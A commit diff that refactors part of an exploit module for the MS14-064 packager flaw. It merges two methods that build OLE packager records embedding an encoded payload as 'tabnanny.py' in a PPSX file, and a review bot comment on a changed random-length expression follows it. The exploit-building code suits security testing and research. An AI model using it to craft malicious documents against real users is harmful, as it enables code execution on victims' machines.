
Commit 31f3aa1

committed
Refactor create packager methods
1 parent 38a96e3 commit 31f3aa1


1 file changed

+17
-49
lines changed

1 file changed

+17
-49
lines changed

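--- a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb
+++ b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb
@@ -60,6 +60,8 @@ def initialize(info={})
 
 def exploit
 print_status("Creating '#{datastore['FILENAME']}' file ...")
+payload_packager = create_packager('tabnanny.py', payload.encoded)
+trigger_packager = create_packager("#{rand_text_alpha(4)}.py", rand_text_alpha(4 + rand(10)))
 zip = zip_ppsx(payload_packager, trigger_packager)
 file_create(zip)
 end
@@ -91,59 +93,25 @@ def zip_ppsx(ole_payload, ole_trigger)
 ppsx.pack
 end
 
-def payload_packager
-payload_name = 'tabnanny.py'
-
-file_info = [2].pack('v')
-file_info << "#{payload_name}\x00"
-file_info << "#{payload_name}\x00"
-file_info << "\x00\x00"
-
-extract_info = [3].pack('v')
-extract_info << [payload_name.length + 1].pack('V')
-extract_info << "#{payload_name}\x00"
-
-p = payload.encoded
-file = [p.length].pack('V')
-file << p
-
-append_info = [payload_name.length].pack('V')
-append_info << Rex::Text.to_unicode(payload_name)
-append_info << [payload_name.length].pack('V')
-append_info << Rex::Text.to_unicode(payload_name)
-append_info << [payload_name.length].pack('V')
-append_info << Rex::Text.to_unicode(payload_name)
-
-ole_data = file_info + extract_info + file + append_info
-ole_contents = [ole_data.length].pack('V') + ole_data
-
-ole = create_ole("\x01OLE10Native", ole_contents)
-
-ole
-end
-
-def trigger_packager
-payload_name = "#{rand_text_alpha(4)}.py"
-
+def create_packager(file_name, contents)
 file_info = [2].pack('v')
-file_info << "#{payload_name}\x00"
-file_info << "#{payload_name}\x00"
+file_info << "#{file_name}\x00"
+file_info << "#{file_name}\x00"
 file_info << "\x00\x00"
 
 extract_info = [3].pack('v')
-extract_info << [payload_name.length + 1].pack('V')
-extract_info << "#{payload_name}\x00"
-
-random_text = rand_text_alpha(4 + rand(4))
-file = [random_text.length].pack('V')
-file << random_text
-
-append_info = [payload_name.length].pack('V')
-append_info << Rex::Text.to_unicode(payload_name)
-append_info << [payload_name.length].pack('V')
-append_info << Rex::Text.to_unicode(payload_name)
-append_info << [payload_name.length].pack('V')
-append_info << Rex::Text.to_unicode(payload_name)
+extract_info << [file_name.length + 1].pack('V')
+extract_info << "#{file_name}\x00"
+
+file = [contents.length].pack('V')
+file << contents
+
+append_info = [file_name.length].pack('V')
+append_info << Rex::Text.to_unicode(file_name)
+append_info << [file_name.length].pack('V')
+append_info << Rex::Text.to_unicode(file_name)
+append_info << [file_name.length].pack('V')
+append_info << Rex::Text.to_unicode(file_name)
 
 ole_data = file_info + extract_info + file + append_info
 ole_contents = [ole_data.length].pack('V') + ole_data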
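Review bot: The new call on line 64 of `exploit` passes `rand_text_alpha(4 + rand(10))`, while the removed `trigger_packager` built its filler with `rand_text_alpha(4 + rand(4))`, so a commit titled as a refactor also changes the range of the generated content length. If that is unintended, keep the old expression, `trigger_packager = create_packager("#{rand_text_alpha(4)}.py", rand_text_alpha(4 + rand(4)))`; if it is intended, state it in the commit message so the change is not lost in the deduplication. The merged helper also has no comment, and a one-liner such as `# file_name: name written into the packager record; contents: raw bytes stored under that name` would document the two parameters that replaced the hard-coded values. The body of `create_packager` continues past the last line of the hunk, so its return value is not visible here.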
